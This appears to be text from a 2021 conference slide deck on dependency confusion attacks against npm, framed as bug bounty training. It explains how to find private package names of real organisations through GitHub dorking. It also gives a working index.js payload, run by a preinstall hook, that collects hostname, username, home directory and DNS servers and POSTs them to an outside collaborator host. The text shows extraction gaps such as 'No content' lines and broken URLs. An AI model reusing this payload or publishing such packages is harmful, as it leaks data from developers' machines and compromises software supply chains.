Bug Bounty Hunter and Trainer Red Team Ops @Agri10x Masters In Cyber Security @UEA Interested in WebApps, Functional Exploits and Bikes INDIAN WHOAMI ?

Dependecy Confusion

What is Dependency Confusion ??? A Dependency Confusion attack, also known as a supply chain substitution attack, occurs when a software installer script is tricked into downloading a malicious code file from a public repository rather than the intended file of the same name from an internal repository.

No content

Difference ??? 1. As seen in the above image, the Public Package contains a higher version than the Private Package. 2. As a result, if the package indexing is not completed properly, it will automatically retrieve the Higher version package from the Public Registry.

How to find Private Packages ? Within Organization, use Github Dorking with keywords like package.json org:Samsung package.json Use filters like : language:json org:Samsung package.json language:json org:target_org package.json language:json

No content

It can be also found using npm package.json disclosure nuclei template.

Case Study https://github.com/facebook/flipper/blob/45ce538c8dd6b44 8388a01e2ed4fa398956e5e20/desktop/eslint-plugin- flipper/package.json 1. 2. Package Name: eslint-plugin-flipper 3. Type: Private wget https://github.com/facebook/flipper/blob/45ce538c8dd6b44 8388a01e2ed4fa398956e5e20/desktop/eslint-plugin- flipper/package.json

We have to check if private package exist or not We have to check on offcial website : https://www.npmjs.com/

Install NPM using the following command Creating Malicious Packages (NPM) apt install npm npm login npm init : Create package 1. 2. 3.

After successful creation of the package.json file , we need to edit the created file to execute our own scripts and command. Index.js const os = require("os");const dns = require("dns");const querystring = require("querystring");const https = require("https");const packageJSON = require("./package.json");const package = packageJSON.name;const trackingData = JSON.stringify({p: package,c: __dirname,hd: os.homedir(),hn: os.hostname(),un: os.userInfo().username,dns: dns.getServers(),r: packageJSON ? packageJSON.___resolved : undefined,v: packageJSON.version,pjson: packageJSON,});var postData = querystring.stringify({msg: trackingData,});var options = {hostname: "burpcollaborator.net", //replace burpcollaborator.net with Interactsh or pipedreamport: 443,path: "/",method: "POST",headers: {"Content-Type": "application/x-www-form-urlencoded","Content-Length": postData.length,},};var req = https.request(options, (res) => {res.on("data", (d) => {process.stdout.write(d);});});req.on("error", (e) => {// console.error(e);});req.write(postData);req.end();

Now there will be two files created package.json , index.js. Before publishing the package to public registry make sure this package name Doesn’t exist in the Public Registry. Use the following command to publish the package. Pushing into Public Registry (NPM)

No content

The Published package contains Higher Version compared to the original one.

packages, our package.json file preinstall scripts will execute the index.js file and obtain the hostname, directory, IP address, and username as shown below.

Thank you guys DAMNcon2021